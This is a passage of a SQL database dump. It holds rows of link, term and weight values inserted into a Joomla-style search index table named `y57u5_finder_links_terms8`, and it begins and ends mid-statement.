(193, 238664, 1.05),
(193, 238665, 0.84),
(304, 238665, 0.84),
(193, 238666, 1.00331),
(193, 238667, 0.93331),
(306, 238667, 0.93331),
(193, 238668, 1.16669),
(193, 238669, 1.00331),
(193, 238670, 1.02669),
(193, 238671, 1.14331),
(193, 238672, 1.12),
(193, 238673, 1.19),
(193, 238674, 0.93331),
(193, 238675, 1.05),
(193, 238676, 0.93331),
(193, 238677, 1.09669),
(193, 238678, 0.93331),
(193, 238679, 1.00331),
(193, 238680, 0.95669),
(193, 238681, 1.28331),
(193, 238682, 0.95669),
(193, 238683, 1.05),
(193, 238684, 2.79993),
(193, 238685, 1.12),
(193, 238686, 1.09669),
(193, 238687, 1.02669),
(193, 238688, 0.95669),
(193, 238689, 1.05),
(193, 238690, 1.02669),
(193, 238784, 1.72662),
(193, 238785, 0.91),
(193, 238786, 0.98),
(193, 238787, 0.98),
(193, 238788, 1.05),
(193, 238789, 2.73),
(193, 238790, 1.00331),
(193, 238791, 1.00331),
(193, 238792, 1.02669),
(193, 238793, 0.86331),
(193, 238794, 1.05),
(193, 238795, 1.00331),
(193, 238796, 0.86331),
(193, 238797, 1.09669),
(193, 238798, 1.00331),
(193, 238799, 0.23331),
(193, 238800, 1.00331),
(193, 238801, 1.09669),
(193, 238802, 1.00331),
(193, 238803, 1.07331),
(193, 238804, 0.51331),
(193, 238805, 1.05),
(193, 238806, 1.16669),
(193, 238807, 0.51331),
(193, 238808, 1.05),
(193, 238809, 1.16669),
(193, 238810, 0.95669),
(193, 238811, 0.98),
(193, 238812, 1.02669),
(193, 238813, 0.93331),
(193, 238814, 1.02669),
(193, 238815, 1.00331),
(193, 238816, 1.28331),
(193, 238817, 0.93331),
(193, 238818, 1.77338),
(265, 238818, 2.66007),
(266, 238818, 2.66007),
(193, 238819, 2.14662),
(193, 238820, 1.00331),
(288, 238820, 1.00331),
(193, 238821, 1.07331),
(193, 238822, 0.98),
(193, 238823, 1.07331),
(193, 238824, 0.93331),
(193, 238825, 1.07331),
(193, 238826, 0.98),
(193, 238827, 0.88669),
(193, 238828, 0.98),
(193, 238829, 1.07331),
(193, 238830, 0.37331),
(193, 238831, 0.95669),
(193, 238832, 1.14331),
(287, 238833, 0.28),
(193, 238833, 1.4),
(193, 238834, 0.93331),
(193, 238835, 1.02669),
(193, 238836, 0.91),
(193, 238837, 0.95669),
(193, 238838, 0.91),
(193, 238839, 0.98),
(193, 238840, 0.95669),
(193, 238841, 1.05),
(193, 238842, 0.95669),
(193, 238843, 1.07331),
(193, 238844, 0.46669),
(306, 238844, 0.46669),
(193, 238845, 1.16669),
(193, 238846, 1.21331),
(193, 238847, 0.51331),
(193, 238848, 1.05),
(193, 238849, 1.23669),
(193, 238850, 1.05),
(193, 238851, 1.12),
(193, 238852, 1.05),
(193, 238853, 1.16669),
(193, 238854, 1.09669),
(193, 238855, 1.12),
(193, 238856, 1.4),
(193, 238857, 1.09669),
(193, 238858, 0.84),
(193, 238859, 0.98),
(193, 238860, 0.88669),
(193, 238861, 0.91),
(193, 238862, 1.09669),
(304, 238863, 0.98),
(193, 238863, 1.96),
(193, 238864, 2.1),
(193, 238865, 0.95669),
(193, 238866, 1.05),
(193, 238867, 1.00331),
(193, 238868, 0.98),
(193, 238869, 1.02669),
(193, 238870, 1.07331),
(193, 238871, 0.91),
(193, 238872, 0.98),
(193, 238873, 0.91),
(193, 238874, 1.00331),
(193, 238875, 1.00331),
(193, 238876, 0.93331),
(193, 238877, 1.09669),
(193, 238878, 0.93331),
(193, 238879, 1.05),
(193, 238880, 0.93331),
(193, 238881, 1.02669),
(193, 238882, 0.95669),
(193, 238883, 1.09669),
(193, 238884, 0.95669),
(193, 238885, 0.88669),
(193, 238886, 0.95669),
(193, 238887, 1.02669),
(193, 238888, 1.09669),
(193, 238889, 0.98),
(193, 238890, 1.00331),
(193, 238891, 0.98),
(193, 238892, 0.88669),
(193, 238893, 0.98),
(193, 238894, 1.02669),
(193, 238895, 0.93331),
(193, 238896, 1.09669),
(193, 238897, 2.4666),
(193, 238898, 3.0666),
(193, 238907, 2.6666),
(193, 238908, 0.95669),
(193, 238909, 1.09669),
(193, 238910, 0.93331),
(193, 238911, 1.07331),
(193, 238912, 1.12),
(193, 238913, 1.21331),
(193, 238914, 1.09669),
(193, 238915, 1.19),
(193, 238916, 1.02669),
(193, 238917, 1.19),
(193, 238918, 0.95669),
(193, 238919, 1.07331),
(193, 238920, 1.07331),
(193, 239128, 0.56),
(193, 239129, 1.07331),
(193, 239130, 1.21331),
(193, 239131, 0.98007),
(193, 239132, 1.96),
(193, 239133, 1.07331),
(193, 239134, 1.07331),
(193, 239135, 0.98),
(193, 239136, 1.19),
(193, 239137, 0.46669),
(193, 239138, 1.05),
(193, 239139, 1.14331),
(193, 239140, 1.77338),
(193, 239141, 1.12),
(193, 239142, 1.02669),
(193, 239143, 0.28),
(193, 239144, 0.93331),
(193, 239145, 1.00331),
(193, 239146, 0.28),
(193, 239147, 1.00331),
(193, 239148, 1.23669),
(193, 239149, 1.07331),
(193, 239150, 1.14331),
(193, 239151, 0.46669),
(193, 239152, 1.00331),
(193, 239153, 1.12),
(193, 239154, 0.51331),
(193, 239155, 1.12),
(193, 239156, 1.26),
(193, 239157, 0.37338),
(193, 239158, 0.84),
(193, 239159, 1.05),
(193, 239160, 0.86331),
(193, 239161, 0.98),
(193, 239162, 0.86331),
(193, 239163, 0.98),
(193, 239164, 1.12),
(193, 239165, 1.00331),
(193, 239166, 0.32669),
(193, 239167, 0.98),
(193, 239168, 1.02669),
(193, 239169, 1.02669),
(193, 239170, 1.00331),
(193, 239171, 1.09669),
(193, 239172, 1.21331),
(193, 239173, 0.84),
(193, 239174, 1.00331),
(193, 239175, 1.07331),
(193, 239176, 1.02669),
(193, 239177, 1.26),
(193, 239178, 1.02669),
(193, 239179, 1.09669),
(193, 239180, 1.09669),
(193, 239181, 1.16669),
(193, 239182, 0.98),
(193, 239183, 1.07331),
(193, 239184, 1.02669),
(193, 239185, 0.69993),
(193, 239186, 3.00993),
(193, 239187, 3.21993),
(193, 239188, 0.46669),
(290, 239188, 0.46669),
(193, 239189, 1.02669),
(193, 239190, 1.21331),
(193, 239191, 0.46669),
(193, 239192, 1.02669),
(193, 239193, 1.26),
(193, 239194, 0.42),
(193, 239195, 1.02669),
(193, 239196, 1.14331),
(193, 239197, 0.95669),
(193, 239198, 1.02669),
(193, 239199, 0.93331),
(193, 239200, 1.00331),
(193, 239201, 1.16669),
(193, 239202, 1.23669),
(193, 239203, 0.93331),
(193, 239204, 1.05),
(193, 239205, 1.05),
(193, 239206, 1.09669),
(193, 239207, 1.16669),
(267, 240305, 0.84),
(273, 240305, 0.84),
(268, 240334, 0.18669),
(267, 240334, 0.37338),
(267, 240422, 0.88669),
(273, 240422, 0.88669),
(267, 240423, 0.95669),
(273, 240423, 0.95669),
(267, 240465, 0.84),
(269, 240465, 1.68),
(267, 240595, 0.95669),
(268, 240595, 0.95669),
(268, 243504, 0.93331),
(269, 243504, 1.86662),
(265, 247609, 0.95669),
(266, 247609, 0.95669),
(268, 247609, 0.95669),
(268, 247618, 0.84),
(274, 247618, 0.84),
(268, 247619, 0.95669),
(274, 247619, 0.95669),
(268, 247627, 0.91),
(274, 247627, 0.91),
(268, 247796, 0.95669),
(270, 247796, 0.95669),
(301, 247796, 0.95669),
(269, 249476, 0.95669),
(270, 249476, 0.95669),
(301, 249476, 0.95669),
(275, 249604, 0.81669),
(306, 249604, 0.81669),
(269, 249604, 1.63338),
(269, 249618, 0.79331),
(275, 249618, 0.79331),
(306, 249618, 1.58662),
(269, 249744, 1.91338),
(274, 249744, 2.87007),
(269, 249747, 0.95669),
(274, 249747, 0.95669),
(270, 250357, 6.45981),
(301, 250357, 6.45981),
(270, 250358, 7.41),
(301, 250358, 7.41),
(270, 250454, 1.14331),
(301, 250454, 1.14331),
(270, 250455, 1.14331),
(301, 250455, 1.14331),
(270, 250456, 1.02669),
(301, 250456, 1.02669),
(270, 250457, 1.14331),
(301, 250457, 1.14331),
(270, 250458, 0.98),
(301, 250458, 0.98),
(270, 250459, 1.07331),
(301, 250459, 1.07331),
(270, 250460, 0.93331),
(301, 250460, 0.93331),
(270, 250461, 1.19),
(301, 250461, 1.19),
(270, 250462, 1.05),
(301, 250462, 1.05),
(270, 250463, 1.16669),
(301, 250463, 1.16669),
(270, 250464, 1.11993),
(301, 250464, 1.11993),
(270, 250465, 0.98),
(301, 250465, 0.98),
(270, 250466, 1.16669),
(301, 250466, 1.16669),
(270, 250467, 1.07331),
(301, 250467, 1.07331),
(270, 250468, 1.16669),
(301, 250468, 1.16669),
(270, 250469, 1.00331),
(301, 250469, 1.00331),
(270, 250470, 1.12),
(301, 250470, 1.12),
(270, 250471, 1.05),
(301, 250471, 1.05),
(270, 250472, 1.02669),
(301, 250472, 1.02669),
(270, 250473, 1.02669),
(301, 250473, 1.02669),
(270, 250474, 1.19),
(301, 250474, 1.19),
(270, 250475, 0.93331),
(301, 250475, 0.93331),
(270, 250476, 1.16669),
(301, 250476, 1.16669),
(270, 250487, 0.56),
(301, 250487, 0.56),
(270, 250488, 1.09669),
(301, 250488, 1.09669),
(270, 250489, 1.19),
(301, 250489, 1.19),
(270, 250490, 0.91),
(274, 250490, 0.91),
(301, 250490, 0.91),
(270, 250491, 1.12),
(301, 250491, 1.12),
(270, 250492, 2.60661),
(301, 250492, 2.60661),
(270, 250493, 0.95669),
(301, 250493, 0.95669),
(270, 250494, 1.12),
(301, 250494, 1.12),
(270, 250495, 0.88669),
(301, 250495, 0.88669),
(270, 250496, 0.98),
(301, 250496, 0.98),
(270, 250497, 1.00331),
(301, 250497, 1.00331),
(270, 250498, 0.95669),
(301, 250498, 0.95669),
(270, 250499, 1.07331),
(301, 250499, 1.07331),
(270, 250526, 1.12),
(301, 250526, 1.12),
(270, 250527, 1.05),
(301, 250527, 1.05),
(270, 250528, 0.95669),
(301, 250528, 0.95669),
(270, 250529, 1.02669),
(301, 250529, 1.02669),
(270, 250530, 0.95669),
(301, 250530, 0.95669),
(270, 250531, 0.98),
(301, 250531, 0.98),
(270, 250532, 1.09669),
(301, 250532, 1.09669),
(270, 250533, 0.95669),
(301, 250533, 0.95669),
(270, 250534, 0.91),
(301, 250534, 0.91),
(270, 250535, 1.02669),
(301, 250535, 1.02669),
(270, 250536, 0.95669),
(301, 250536, 0.95669),
(270, 250537, 0.91),
(301, 250537, 0.91),
(270, 250538, 0.98),
(301, 250538, 0.98),
(270, 250539, 0.91),
(301, 250539, 0.91),
(270, 250546, 0.91),
(301, 250546, 0.91),
(270, 250547, 1.00331),
(301, 250547, 1.00331),
(270, 250624, 1.05),
(301, 250624, 1.05),
(270, 250625, 1.00331),
(301, 250625, 1.00331),
(270, 250626, 1.12),
(301, 250626, 1.12),
(270, 250627, 0.46669),
(301, 250627, 0.46669),
(270, 250628, 1.00331),
(301, 250628, 1.00331),
(270, 250629, 1.09669),
(301, 250629, 1.09669),
(270, 250630, 1.21331),
(301, 250630, 1.21331),
(265, 251037, 1.00331),
(266, 251037, 1.00331),
(265, 251038, 1.14331),
(266, 251038, 1.14331),
(265, 251039, 0.32669),
(266, 251039, 0.32669),
(265, 251040, 0.98),
(266, 251040, 0.98),
(265, 251041, 1.05),
(266, 251041, 1.05),
(265, 251042, 0.95669),
(266, 251042, 0.95669),
(265, 251043, 1.07331),
(266, 251043, 1.07331),
(265, 251044, 0.84),
(266, 251044, 0.84),
(288, 251044, 0.84),
(265, 251045, 0.98),
(266, 251045, 0.98),
(265, 251046, 0.88669),
(266, 251046, 0.88669),
(265, 251047, 0.95669),
(266, 251047, 0.95669),
(265, 251048, 0.98),
(266, 251048, 0.98),
(265, 251049, 1.09669),
(266, 251049, 1.09669),
(265, 251050, 1.02669),
(266, 251050, 1.02669),
(265, 251051, 1.09669),
(266, 251051, 1.09669),
(265, 251052, 1.02669),
(266, 251052, 1.02669),
(265, 251053, 0.86331),
(266, 251053, 0.86331),
(265, 251054, 0.93331),
(266, 251054, 0.93331),
(265, 251055, 0.84),
(266, 251055, 0.84),
(265, 251056, 1.00331),
(266, 251056, 1.00331),
(265, 251057, 0.98),
(266, 251057, 0.98),
(265, 251058, 0.95669),
(266, 251058, 0.95669),
(265, 251059, 0.93331),
(266, 251059, 0.93331),
(265, 251060, 1.02669),
(266, 251060, 1.02669),
(265, 251061, 0.91),
(266, 251061, 0.91),
(265, 251062, 1.02669),
(266, 251062, 1.02669),
(265, 251075, 1.07331),
(266, 251075, 1.07331),
(265, 251076, 0.93331),
(266, 251076, 0.93331),
(265, 251077, 1.09669),
(266, 251077, 1.09669),
(265, 251078, 1.09669),
(266, 251078, 1.09669),
(265, 251079, 2.66339),
(266, 251079, 2.66339),
(265, 251080, 0.88669),
(266, 251080, 0.88669),
(265, 251081, 0.98),
(266, 251081, 0.98),
(265, 251082, 1.02669),
(266, 251082, 1.02669),
(265, 251083, 0.95669),
(266, 251083, 0.95669),
(265, 251084, 0.91),
(266, 251084, 0.91),
(265, 251085, 1.07331),
(266, 251085, 1.07331),
(265, 251086, 0.95669),
(266, 251086, 0.95669),
(265, 251087, 1.02669),
(266, 251087, 1.02669),
(265, 251141, 1.12),
(266, 251141, 1.12),
(265, 251142, 1.07331),
(266, 251142, 1.07331),
(265, 251143, 1.16669),
(266, 251143, 1.16669),
(265, 251144, 1.05),
(266, 251144, 1.05),
(265, 251145, 1.14331),
(266, 251145, 1.14331),
(265, 251146, 0.88669),
(266, 251146, 0.88669),
(265, 251147, 0.95669),
(266, 251147, 0.95669),
(265, 251148, 0.95669),
(266, 251148, 0.95669),
(265, 251149, 1.19),
(266, 251149, 1.19),
(265, 251150, 1.07331),
(266, 251150, 1.07331),
(265, 251151, 1.00331),
(266, 251151, 1.00331),
(265, 251152, 0.98),
(266, 251152, 0.98),
(265, 251153, 1.05),
(266, 251153, 1.05),
(265, 251154, 0.84),
(266, 251154, 0.84),
(265, 251155, 0.91),
(266, 251155, 0.91),
(265, 251156, 0.98),
(266, 251156, 0.98),
(265, 251157, 0.95669),
(266, 251157, 0.95669),
(265, 251158, 1.05),
(266, 251158, 1.05),
(265, 251159, 1.07331),
(266, 251159, 1.07331),
(265, 251160, 1.02669),
(266, 251160, 1.02669),
(265, 251161, 0.98),
(266, 251161, 0.98),
(304, 251161, 0.98),
(274, 251161, 7.98),
(265, 251162, 1.05),
(266, 251162, 1.05),
(304, 251162, 1.05),
(274, 251162, 8.55),
(265, 251163, 0.93331),
(266, 251163, 0.93331),
(265, 251164, 1.05),
(266, 251164, 1.05),
(265, 251165, 0.91),
(266, 251165, 0.91),
(265, 251166, 1.00331),
(266, 251166, 1.00331),
(265, 251167, 0.95669),
(266, 251167, 0.95669),
(265, 251168, 0.88669),
(266, 251168, 0.88669),
(265, 251169, 0.95669),
(266, 251169, 0.95669),
(265, 251170, 0.93331),
(266, 251170, 0.93331),
(265, 251171, 1.05),
(266, 251171, 1.05),
(265, 251180, 0.93331),
(266, 251180, 0.93331),
(265, 251231, 0.93331),
(266, 251231, 0.93331),
(265, 251232, 1.02669),
(266, 251232, 1.02669),
(265, 251233, 1.05),
(266, 251233, 1.05),
(265, 251234, 1.12),
(266, 251234, 1.12),
(265, 251235, 1.21331),
(266, 251235, 1.21331),
(265, 251236, 0.98),
(266, 251236, 0.98),
(265, 251237, 1.05),
(266, 251237, 1.05),
(265, 251238, 0.88669),
(266, 251238, 0.88669),
(265, 251239, 1.02669),
(266, 251239, 1.02669),
(265, 251240, 1.14331),
(266, 251240, 1.14331),
(265, 251241, 0.32669),
(266, 251241, 0.32669),
(265, 251242, 0.95669),
(266, 251242, 0.95669),
(265, 251243, 1.05),
(266, 251243, 1.05),
(265, 251244, 1.00331),
(266, 251244, 1.00331),
(265, 251245, 1.09669),
(266, 251245, 1.09669),
(265, 251246, 1.00331),
(266, 251246, 1.00331),
(265, 251247, 1.12),
(266, 251247, 1.12),
(265, 251248, 0.88669),
(266, 251248, 0.88669),
(265, 251249, 1.00331),
(266, 251249, 1.00331),
(265, 251250, 2.66007),
(266, 251250, 2.66007),
(265, 251251, 3.42993),
(266, 251251, 3.42993),
(272, 253155, 0.28),
(280, 253155, 0.28),
(272, 253156, 0.91),
(280, 253156, 0.91),
(272, 253157, 1.05),
(280, 253157, 1.05),
(272, 253158, 0.65338),
(280, 253158, 0.65338),
(272, 253159, 1.05),
(280, 253159, 1.05),
(272, 253160, 1.14331),
(280, 253160, 1.14331),
(272, 253161, 1.07331),
(280, 253161, 1.07331),
(272, 253162, 1.16669),
(280, 253162, 1.16669),
(272, 253163, 1.12),
(280, 253163, 1.12),
(272, 253164, 1.28331),
(280, 253164, 1.28331),
(272, 253165, 1.09669),
(280, 253165, 1.09669),
(272, 253166, 1.35331),
(280, 253166, 1.35331),
(272, 253167, 0.98),
(280, 253167, 0.98),
(272, 253168, 1.09669),
(280, 253168, 1.09669),
(272, 253169, 1.21331),
(280, 253169, 1.21331),
(272, 253170, 1.37669),
(280, 253170, 1.37669),
(272, 253171, 1.09669),
(280, 253171, 1.09669),
(272, 253172, 1.09669),
(280, 253172, 1.09669),
(272, 253173, 0.32669),
(280, 253173, 0.32669),
(272, 253174, 1.05),
(280, 253174, 1.05),
(272, 253175, 1.14331),
(280, 253175, 1.14331),
(272, 253176, 0.37331),
(280, 253176, 0.37331),
(305, 253176, 0.37331),
(272, 253177, 1.02669),
(280, 253177, 1.02669),
(272, 253178, 1.26),
(280, 253178, 1.26),
(306, 253179, 0.56),
(272, 253179, 1.12),
(280, 253179, 1.12),
(272, 253180, 2.19338),
(280, 253180, 2.19338),
(272, 253181, 1.16669),
(280, 253181, 1.16669),
(272, 253182, 1.23669),
(280, 253182, 1.23669),
(272, 253183, 1.05),
(280, 253183, 1.05),
(272, 253184, 1.21331),
(280, 253184, 1.21331),
(272, 253185, 1.09669),
(280, 253185, 1.09669),
(272, 253186, 1.26),
(280, 253186, 1.26),
(272, 253187, 1.02669),
(280, 253187, 1.02669),
(272, 253188, 1.26),
(280, 253188, 1.26),
(272, 253189, 1.05),
(280, 253189, 1.05),
(272, 253190, 1.14331),
(280, 253190, 1.14331),
(272, 253191, 2.00662),
(280, 253191, 2.00662),
(272, 253192, 1.12),
(280, 253192, 1.12),
(272, 253193, 1.12),
(280, 253193, 1.12),
(272, 253194, 1.00331),
(280, 253194, 1.00331),
(272, 253195, 1.07331),
(280, 253195, 1.07331),
(272, 253196, 1.07331),
(280, 253196, 1.07331),
(272, 253197, 1.16669),
(280, 253197, 1.16669),
(272, 253200, 1.00331),
(280, 253200, 1.00331),
(272, 253201, 1.09669),
(280, 253201, 1.09669),
(272, 253202, 1.00331),
(280, 253202, 1.00331),
(272, 253203, 1.07331),
(280, 253203, 1.07331),
(272, 253204, 1.16669),
(280, 253204, 1.16669),
(272, 253205, 1.16669),
(280, 253205, 1.16669),
(272, 253206, 1.53993),
(280, 253206, 1.53993),
(272, 253207, 1.05),
(280, 253207, 1.05),
(272, 253208, 1.16669),
(280, 253208, 1.16669),
(272, 253209, 1.09669),
(280, 253209, 1.09669),
(272, 253210, 1.16669),
(280, 253210, 1.16669),
(272, 253211, 1.07331),
(280, 253211, 1.07331),
(272, 253212, 1.16669),
(280, 253212, 1.16669),
(272, 253213, 0.37331),
(280, 253213, 0.37331),
(272, 253214, 0.98),
(280, 253214, 0.98),
(272, 253215, 1.12),
(280, 253215, 1.12),
(272, 253216, 1.07331),
(280, 253216, 1.07331),
(272, 253217, 1.14331),
(280, 253217, 1.14331),
(272, 253218, 1.14331),
(280, 253218, 1.14331),
(272, 253219, 1.26),
(280, 253219, 1.26),
(272, 253220, 1.37669),
(280, 253220, 1.37669),
(272, 253221, 0.98),
(280, 253221, 0.98),
(272, 253222, 1.09669),
(280, 253222, 1.09669),
(272, 253223, 0.37331),
(280, 253223, 0.37331),
(306, 253223, 3.03981),
(272, 253224, 1.12),
(280, 253224, 1.12),
(272, 253225, 1.28331),
(280, 253225, 1.28331),
(272, 253226, 0.84),
(280, 253226, 0.84),
(306, 253226, 0.84),
(272, 253227, 0.98),
(280, 253227, 0.98),
(272, 253228, 1.02669),
(280, 253228, 1.02669),
(272, 253229, 1.05),
(280, 253229, 1.05),
(272, 253260, 0.28),
(280, 253260, 0.28),
(272, 253261, 0.91),
(280, 253261, 0.91),
(272, 253262, 1.02669),
(280, 253262, 1.02669),
(272, 253263, 1.82),
(280, 253263, 1.82),
(272, 253264, 0.95669),
(280, 253264, 0.95669),
(272, 253265, 0.98),
(280, 253265, 0.98),
(272, 253267, 1.00331),
(280, 253267, 1.00331),
(272, 253268, 0.91),
(280, 253268, 0.91),
(272, 253269, 1.05),
(280, 253269, 1.05),
(272, 253270, 1.16669),
(280, 253270, 1.16669),
(272, 253271, 1.02669),
(280, 253271, 1.02669),
(272, 253272, 0.93331),
(280, 253272, 0.93331),
(272, 253273, 1.12),
(280, 253273, 1.12),
(272, 253274, 0.88669),
(280, 253274, 0.88669),
(272, 253275, 0.98),
(280, 253275, 0.98),
(272, 253276, 0.98),
(280, 253276, 0.98),
(272, 253277, 1.00331),
(280, 253277, 1.00331),
(272, 253278, 0.98),
(280, 253278, 0.98),
(272, 253279, 1.12),
(280, 253279, 1.12),
(272, 253325, 1.02669),
(280, 253325, 1.02669),
(272, 253326, 1.00331),
(280, 253326, 1.00331),
(272, 253327, 0.98),
(280, 253327, 0.98),
(272, 253328, 0.91),
(280, 253328, 0.91),
(272, 253329, 2.8),
(280, 253329, 2.8),
(272, 253330, 1.07331),
(280, 253330, 1.07331),
(272, 253331, 1.23669),
(280, 253331, 1.23669),
(272, 253332, 1.05),
(280, 253332, 1.05),
(272, 253333, 1.14331),
(280, 253333, 1.14331),
(272, 253334, 1.16669),
(280, 253334, 1.16669),
(272, 253335, 1.33),
(280, 253335, 1.33),
(272, 253336, 1.12),
(280, 253336, 1.12),
(272, 253337, 1.19),
(280, 253337, 1.19),
(272, 253338, 1.14331),
(280, 253338, 1.14331),
(272, 253339, 1.37669),
(280, 253339, 1.37669),
(272, 253340, 0.91),
(280, 253340, 0.91),
(272, 253341, 1.12),
(280, 253341, 1.12),
(272, 253342, 1.07331),
(275, 253342, 1.07331),
(280, 253342, 1.07331),
(272, 253343, 1.19),
(280, 253343, 1.19),
(272, 253344, 0.56),
(280, 253344, 0.56),
(272, 253345, 1.05),
(280, 253345, 1.05),
(272, 253346, 1.16669),
(280, 253346, 1.16669),
(272, 253347, 1.21331),
(280, 253347, 1.21331),
(272, 253348, 1.4),
(280, 253348, 1.4),
(272, 253349, 0.88669),
(280, 253349, 0.88669),
(272, 253350, 1.05),
(280, 253350, 1.05),
(272, 253351, 1.05),
(280, 253351, 1.05),
(272, 253352, 1.00331),
(280, 253352, 1.00331),
(272, 253353, 0.88669),
(280, 253353, 0.88669),
(272, 253354, 0.95669),
(280, 253354, 0.95669),
(272, 253355, 0.86331),
(280, 253355, 0.86331),
(272, 253356, 0.93331),
(280, 253356, 0.93331),
(272, 253357, 1.02669),
(280, 253357, 1.02669),
(272, 253358, 1.12),
(280, 253358, 1.12),
(272, 253359, 1.09669),
(280, 253359, 1.09669),
(272, 253360, 1.23669),
(280, 253360, 1.23669),
(272, 253361, 0.95669),
(280, 253361, 0.95669),
(272, 253362, 1.05),
(280, 253362, 1.05),
(272, 253363, 0.86331),
(280, 253363, 0.86331),
(272, 253364, 0.98),
(280, 253364, 0.98),
(272, 253365, 0.91),
(280, 253365, 0.91),
(272, 253366, 1.12),
(280, 253366, 1.12),
(272, 253367, 1.00331),
(280, 253367, 1.00331),
(272, 253368, 0.86331),
(280, 253368, 0.86331),
(272, 253369, 0.98),
(280, 253369, 0.98),
(272, 253370, 0.98),
(280, 253370, 0.98),
(272, 253379, 1.21331),
(280, 253379, 1.21331),
(272, 253380, 1.12),
(280, 253380, 1.12),
(272, 253381, 1.23669),
(280, 253381, 1.23669),
(272, 253493, 0.23331),
(280, 253493, 0.23331),
(272, 253494, 1.00331),
(280, 253494, 1.00331),
(272, 253495, 1.14331),
(280, 253495, 1.14331),
(272, 253496, 0.98),
(280, 253496, 0.98),
(272, 253497, 0.93331),
(280, 253497, 0.93331),
(272, 253498, 1.00331),
(280, 253498, 1.00331),
(272, 253499, 0.91),
(280, 253499, 0.91),
(272, 253500, 1.05),
(280, 253500, 1.05),
(272, 253501, 1.02669),
(280, 253501, 1.02669),
(272, 253502, 0.37331),
(280, 253502, 0.37331),
(272, 253503, 1.02669),
(280, 253503, 1.02669),
(272, 253504, 1.26),
(280, 253504, 1.26),
(272, 253505, 0.23331),
(280, 253505, 0.23331),
(272, 253508, 1.05),
(280, 253508, 1.05),
(272, 253509, 0.28),
(280, 253509, 0.28),
(272, 253510, 0.93331),
(280, 253510, 0.93331),
(272, 253511, 1.05),
(280, 253511, 1.05),
(272, 253512, 1.00331),
(280, 253512, 1.00331),
(272, 253513, 0.46669),
(280, 253513, 0.46669),
(272, 253514, 1.00331),
(280, 253514, 1.00331),
(272, 253515, 1.14331),
(280, 253515, 1.14331),
(273, 256080, 0.84),
(273, 256081, 0.98),
(273, 256082, 0.86331),
(273, 256083, 0.98),
(273, 256174, 0.18669),
(305, 256174, 0.18669),
(273, 256175, 0.95669),
(273, 256176, 1.05),
(273, 256177, 1.14331),
(273, 256178, 0.98),
(273, 256179, 1.07331),
(273, 256180, 1.05),
(273, 256181, 1.14331),
(273, 256182, 0.14),
(273, 256183, 0.91),
(273, 256184, 1.05),
(273, 256185, 1.14331),
(273, 256186, 1.23669),
(273, 256187, 0.93331),
(273, 256188, 0.91),
(273, 256189, 0.86331),
(273, 256190, 0.98),
(273, 256191, 1.07331),
(273, 256192, 1.14331),
(273, 256193, 0.28),
(273, 256194, 0.95669),
(273, 256195, 1.05),
(273, 256196, 0.88669),
(273, 256197, 0.98),
(273, 256198, 1.02669),
(273, 256217, 0.51331),
(273, 256218, 1.05),
(273, 256219, 1.26),
(273, 256220, 2.66339),
(273, 256221, 0.23331),
(273, 256222, 0.88669),
(273, 256223, 1.00331),
(273, 256224, 1.00331),
(273, 256225, 1.09669),
(273, 256226, 0.95669),
(273, 256227, 1.05),
(273, 256258, 0.91),
(273, 256259, 0.84),
(273, 256260, 0.91),
(273, 256261, 0.95669),
(273, 256262, 0.95669),
(273, 256263, 1.05),
(273, 256264, 1.00331),
(306, 256264, 1.00331),
(273, 256265, 0.91),
(273, 256266, 1.00331),
(273, 256267, 0.91),
(273, 256268, 0.95669),
(273, 256269, 1.07331),
(273, 256270, 0.95669),
(273, 256271, 1.02669),
(273, 256272, 1.00331),
(273, 256273, 1.12),
(273, 256274, 0.84),
(273, 256275, 0.95669),
(273, 256276, 0.95669),
(273, 256277, 1.05),
(273, 256278, 0.95669),
(273, 256279, 4.75323),
(273, 256280, 1.02669),
(273, 256281, 0.88669),
(273, 256282, 1.07331),
(273, 256283, 1.00331),
(273, 256284, 0.81669),
(273, 256285, 0.95669),
(273, 256286, 2.4666),
(273, 256287, 2.8),
(273, 256300, 2.6666),
(273, 256301, 1.02669),
(273, 256302, 1.02669),
(273, 256303, 1.12),
(273, 256304, 0.28),
(273, 256305, 0.81669),
(273, 256306, 0.86331),
(273, 256307, 0.81669),
(273, 256308, 0.86331),
(273, 256411, 0.95669),
(273, 256412, 1.07331),
(273, 256413, 0.46662),
(273, 256414, 0.93331),
(273, 256415, 1.02669),
(273, 256416, 0.91),
(273, 256417, 1.09669),
(273, 256418, 0.95669),
(273, 256419, 1.05),
(288, 264646, 1.02669),
(299, 264646, 1.02669),
(288, 264764, 0.95669),
(299, 264764, 0.95669),
(233, 266447, 1.19),
(233, 266448, 1.28331),
(233, 266449, 0.93331),
(233, 266450, 1.02669),
(233, 266451, 1.02669),
(233, 266452, 1.09669),
(233, 266453, 1.00331),
(233, 266454, 1.28331),
(233, 266455, 0.95669),
(233, 266456, 1.21331),
(233, 266457, 1.19);
INSERT INTO `y57u5_finder_links_terms8` (`link_id`, `term_id`, `weight`) VALUES
(233, 266458, 1.02669),
(233, 266459, 1.14331),
(233, 266460, 1.00331),
(233, 266461, 1.05),
(233, 266462, 0.95669),
(233, 266463, 1.05),
(233, 266464, 0.28),
(305, 266464, 0.28),
(233, 266465, 0.91),
(305, 266465, 0.91),
(233, 266466, 1.00331),
(305, 266466, 1.00331),
(233, 266476, 1.00331),
(233, 266477, 0.88669),
(233, 266478, 0.95669),
(233, 266479, 0.98),
(233, 266480, 1.21331),
(233, 266481, 1.05),
(233, 266482, 1.16669),
(233, 266483, 1.09669),
(233, 266484, 0.93331),
(233, 266485, 0.88669),
(233, 266486, 1.02669),
(233, 266487, 0.98),
(233, 266488, 0.95669),
(233, 266547, 0.86331),
(233, 266548, 1.00331),
(233, 266549, 0.95669),
(233, 266550, 0.51331),
(233, 266551, 1.19),
(233, 266552, 1.28331),
(233, 266553, 0.91),
(233, 266554, 1.07331),
(233, 266555, 1.02669),
(233, 266556, 1.07331),
(233, 266557, 0.88669),
(233, 266558, 0.98),
(233, 266559, 0.93331),
(233, 266560, 1.05),
(233, 266561, 0.95669),
(233, 266562, 2.4),
(233, 266563, 2.6666),
(233, 266566, 2.6),
(233, 266567, 1.00331),
(233, 266568, 1.14331),
(233, 266619, 1.09669),
(233, 266620, 1.19),
(233, 266621, 1.05),
(233, 266622, 0.98),
(233, 266623, 0.98),
(233, 266624, 0.88669),
(233, 266625, 0.93331),
(233, 266626, 1.05),
(233, 266627, 0.93331),
(233, 266628, 1.02669),
(233, 266629, 0.93331),
(233, 266630, 1.02669),
(235, 267378, 0.88669),
(235, 267379, 0.93331),
(235, 267552, 0.93331),
(235, 267553, 1.00331),
(235, 267554, 0.91),
(235, 267555, 1.14331),
(235, 267556, 0.91),
(235, 267557, 1.05),
